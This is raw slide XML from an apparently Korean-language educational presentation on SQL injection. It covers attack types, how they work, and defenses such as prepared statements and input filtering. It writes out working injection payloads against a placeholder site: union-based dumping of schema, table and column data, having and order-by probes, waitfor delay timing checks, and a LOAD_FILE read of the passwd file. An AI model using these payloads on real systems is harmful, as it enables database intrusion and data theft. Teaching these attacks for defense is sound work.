              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>데이터 노출</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(Data Disclosure)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E7BFC-A926-4508-8E1D-19B3E12A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Error based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에러메시지를 기반으로 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Group by, Having </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>구문 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Group by: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>데이터들을 원하는 그룹으로 나누는 구문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Having: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>집계 함수를 가지고 조건비교를 할 때 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Having </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>구문은 반드시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Group by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>와 함께 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko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74CFE-A137-436A-B8BA-8298FD2B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based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F93A-3E78-4B41-942D-443353A3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13" y="2345196"/>
            <a:ext cx="10515600" cy="48323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www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>having</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1=1--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143B39A-1995-441F-A84A-1CCA4379D4B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813913" y="2345196"/>
            <a:ext cx="10515600" cy="48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www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1’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  <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> having</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1=1--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C74772-A8F4-4C46-AAC5-0807E040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13" y="3222131"/>
            <a:ext cx="11402373" cy="1015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399C95-D92B-4854-959C-E7582CEE4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3" y="3212201"/>
            <a:ext cx="11353800" cy="10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89FC6-C8C7-42A0-BA6C-04F0A670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공격 유형</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>데이터 노출</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(Data Disclosure)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E7BFC-A926-4508-8E1D-19B3E12A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Union based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Order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>구문을 사용하여 컬럼 개수 얻음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Order by I: field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>명 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 기준으로 정렬하는 구문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대신 숫자를 사용하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>번째 필드 값을 기준으로 정렬</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>연산자를 사용해 쿼리를 합쳐 정상 페이지 출력</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Union: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>집합 연산자 중 하나로 두 쿼리문의 결과를 합치는 연산자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Database() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용하여 데이터베이스 명 얻음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko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6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26093-930B-4BFE-9B64-24FEB582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 based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36D8-879C-472C-A24E-8694B6EE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0469"/>
            <a:ext cx="10515600" cy="577941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www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1+order+by+1--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90CF316-B21B-4BD9-8E6C-4FA2BDF9DE1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923925" y="1979509"/>
            <a:ext cx="10515600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3"/>
              </a:rPr>
              <a:t>www.example.com/?idx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2A81CD6-DD32-4A26-861B-AB9A617FD99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2660469"/>
            <a:ext cx="10515600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3"/>
              </a:rPr>
              <a:t>www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1+order+by+2--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CF880D-530B-4E77-90FF-C380606F4FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2684008"/>
            <a:ext cx="10515600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3"/>
              </a:rPr>
              <a:t>www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1+order+by+3--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9AF287D-50B7-499F-B41A-49BFDF803F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2672238"/>
            <a:ext cx="10515600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3"/>
              </a:rPr>
              <a:t>www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1+order+by+4--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48DA996-6F90-4CAA-9222-830E962347B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2677412"/>
            <a:ext cx="10515600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3"/>
              </a:rPr>
              <a:t>www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1+union+select+1,2,3,4,5--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5A0A4E0-4826-4932-9327-5502658115BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2674825"/>
            <a:ext cx="10515600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3"/>
              </a:rPr>
              <a:t>www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1+order+by+5--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2D577B1-BE42-48E5-B0A7-4E984E55E15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923925" y="2687520"/>
            <a:ext cx="10515600" cy="58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3"/>
              </a:rPr>
              <a:t>www.example.com/?idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=-99+union+select+1,database(),3,4,5--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1FE0F6-27BC-4061-BBEC-0267CC45DF6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923925" y="3206752"/>
            <a:ext cx="10515600" cy="1203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4"/>
              </a:rPr>
              <a:t>www.example.com/?idx=-99+union+select+1,group_concat(table_name)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,3,4,5+from+information_schema.tables+where+table_schema=database()--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C0969C2-131B-4F68-9043-BFFF3FD9617D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923925" y="3206751"/>
            <a:ext cx="10515600" cy="1203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5"/>
              </a:rPr>
              <a:t>www.example.com/?idx=-99+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>테이블명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>--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D947F2F-02EB-4A6D-B929-C7B5A8677F7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923925" y="3234350"/>
            <a:ext cx="10515600" cy="1203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6"/>
              </a:rPr>
              <a:t>www.example.com/?idx=-99+union+select+1,group_concat(concat_ws(0x3a,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>컬럼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>컬럼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2),3,4,5+from+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>테이블명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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8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89FC6-C8C7-42A0-BA6C-04F0A670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공격 유형</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>데이터 노출</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(Data Disclosure)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E7BFC-A926-4508-8E1D-19B3E12A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Time based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에러가 발생하지 않는 사이트에 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Wait for delay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>명령어 사용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, TRUE/FALSE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>판별</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>상당한 시간을 요함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8E783-57E4-40C1-9E89-980708BE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based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56EEB-101C-4AD1-AE8A-3B34A580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공격 가능 여부 파악</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파라미터에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>FALSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>조건을 넣는다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>AND 1=0, AND 1=1</a:t>
            </a:r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조건에서 정상 페이지가 출력된다면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>조건절에서 먹힌다는 의미로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격이 가능함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Time based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격 가능 여부 파악</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> delay “0:0:5’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초 뒤 웹페이지가 뜬다면 공격 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(MS SQL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Substring(), Unicode(), cast() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>함수를 통해 한 글자 씩 아스키 값과 비교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1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BB9B0-EBDD-4940-A668-D30D190E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 유형</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>원격 명령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0590E-F099-44F9-8BB1-8A84C50D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 SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에서 주로 사용되며 저장 프로시저를 이용하여 공격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5F1422-6D96-47C0-8400-4226CF5A35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993"/>
            <a:ext cx="10515600" cy="6034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9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C2A96-5AAD-4B4B-9106-E8ABABE6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방어법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6A498-4039-46D8-9E9C-97178FAC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동적 구문 대신 저장 프로시저 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인수를 받을 때 특수 문자 여부를 검사하여 필터링</a:t>
            </a:r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서버 오류 발생 시 해당하는 에러 메시지를 보여주지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Statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대신 특수문자를 막아주는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>prepare statement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패스워드같은 입력 값은 해시함수 적용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05D3-9C0A-48D9-A16A-11C2BD7B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849F1-1759-4064-9CB5-34C20294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en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Arch Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실습 서버 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Webhacking.kr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Chrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>관리자 모드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1362-8819-42B4-B7D8-56E85D2B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A44EC-D119-4AE9-BA4B-460A9230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12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D3CD0-20D1-4269-A1AA-1038376B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B2BC5-C390-447A-8651-BC97FE73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Injection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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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공격 종류</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방어법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610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BE483-1414-40D4-A039-422657B1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3D4FF-9D38-4E18-9E7E-91E9A199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99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2D6AC-B531-4FB4-B1E2-82517D16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293D8-7EE9-4B33-8E3F-1EBCCDE4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E231D-E4FA-4759-AACD-28720518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Injection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E6C3E-B5CB-4A6B-AD16-E6C38565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전송 받는 인수에 포함된</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>특정 명령을 실행하는 코드를 필터링 하지 못하면 취약점 발생</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>신뢰할 수 없는 데이터가 명령어나 질의문의 일부분으로 인터프리터로 보내질 때 발생</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SQL, NoSQL, OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>등 다양한 종류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D06AD8-98E0-4E29-8965-FE5D92FE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3126"/>
            <a:ext cx="11061987" cy="5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311B4-48ED-42DA-A8D8-E9EF1BB7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Injection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5396C-1605-478D-8945-4FBFA3CFA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 언어에 이루어지는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Injection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en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리의 참과 거짓일 때의 서버 반응으로 데이터를 얻어내는 기술</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격 종류</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인증 우회</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>데이터 노출</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>원격 명령 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko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34E0C-7848-4A59-BCF8-5265E640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동작 원리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2913299-A67E-4CC7-90C6-F4D060E9F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14175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0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107A1-8369-4FCC-9E16-814C6DE3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2496C-BF4D-4929-8373-FF0C3214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잘못된 유형 처리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>LOAD_FILE() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>같은 함수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 사용한다면 특수 문자 없이 공격 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>LOAD_FILE(): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일을 읽고 파일 내용을 반환하는 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>불러올 파일이 서버에 존재해야 함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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경로를 입력해야 하며 접근 권한 필요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Select * from user UNION select LOAD_FILE(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>＇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/passwd’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일을 결과 값으로 볼 수 있음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9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107A1-8369-4FCC-9E16-814C6DE3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2496C-BF4D-4929-8373-FF0C3214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부적절한 에러 처리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>입력 값에 대한 적절한 에러 처리를 하지 않아서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에러 메시지에 서버의 정보가 노출</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>잘못된 입력 값에 대해서 상세한 설명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Database,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컬럼들의 이름</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 자료형 등등</a:t>
            </a:r>
